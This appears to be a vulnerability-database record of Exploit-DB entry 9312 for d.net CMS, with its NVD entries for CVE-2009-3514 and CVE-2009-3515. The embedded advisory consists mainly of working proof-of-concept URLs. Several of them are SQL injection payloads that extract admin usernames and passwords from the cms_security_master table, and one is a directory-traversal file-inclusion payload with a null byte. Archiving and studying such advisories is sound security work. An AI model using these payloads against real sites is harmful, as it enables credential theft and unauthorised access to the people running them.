{"id": "EDB-ID:9312", "hash": "7d9cd340c3bab29483b5991f4e1d656e", "type": "exploitdb", "bulletinFamily": "exploit", "title": "d.net CMS LFI/sqli Multiple Vulnerabilities", "description": "d.net CMS (LFI/SQLI) Multiple Remote Vulnerabilities. CVE-2009-3514,CVE-2009-3515. Webapps exploit for php platform", "published": "2009-07-30T00:00:00", "modified": "2009-07-30T00:00:00", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/9312/", "reporter": "SirGod", "references": [], "cvelist": ["CVE-2009-3515", "CVE-2009-3514"], "lastseen": "2016-02-01T10:19:30", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 7.3, "vector": "NONE", "modified": "2016-02-01T10:19:30"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-3514", "CVE-2009-3515"]}], "modified": "2016-02-01T10:19:30"}, "vulnersScore": 7.3}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/9312/", "sourceData": "###############################################################################################################################################\n[+] d.net CMS (LFI/SQLI) Multiple Remote Vulnerabilities\n[+] Discovered By SirGod\n[+] http://insecurity-ro.org\n[+] http://h4cky0u.org\n###############################################################################################################################################\n\n[+] Download : http://sourceforge.net/projects/dnet/\n\n[+] SQL Injection\n\n PoC's\n\n - No admin required\n\n http://127.0.0.1/path/index.php?page=null+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,\n6,7+from+cms_security_master+where+id=1--\n\n - Admin required\n\n http://127.0.0.1/path/dnet_admin/index.php?edit_id=null+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,\n6,7,8,9+from+cms_security_master+where+id=1--&_p=1&type=news\n\n http://127.0.0.1/path/dnet_admin/index.php?edit_id=1&_p=null+union+all+select+1,2,concat_ws(0x3a,username,password),4,\n5,6,7+from+cms_security_master+where+id=1--&type=news\n\n[+] Local File Inclusion\n\n - PoC\n\n - Admin required\n\n http://127.0.0.1/path/dnet_admin/index.php?edit_id=2&_p=2&type=../../../../../../boot.ini%00\n\n###############################################################################################################################################\n\n# milw0rm.com [2009-07-30]\n", "osvdbidlist": ["58491", "58490", "58489"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2019-05-29T18:10:00", "bulletinFamily": "NVD", "description": "Multiple SQL injection vulnerabilities in d.net CMS allow remote attackers to execute arbitrary SQL commands via (1) the page parameter to index.php; and allow remote authenticated administrators to execute arbitrary SQL commands via the (2) edit_id and (3) _p parameter in a news action to dnet_admin/index.php.", "modified": "2017-09-19T01:29:00", "id": "CVE-2009-3514", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3514", "published": "2009-10-01T14:30:00", "title": "CVE-2009-3514", "type": "cve", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:10:00", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in dnet_admin/index.php in d.net CMS allows remote authenticated administrators to include and execute arbitrary local files via a .. (dot dot) in the type parameter.", "modified": "2017-09-19T01:29:00", "id": "CVE-2009-3515", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3515", "published": "2009-10-01T14:30:00", "title": "CVE-2009-3515", "type": "cve", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}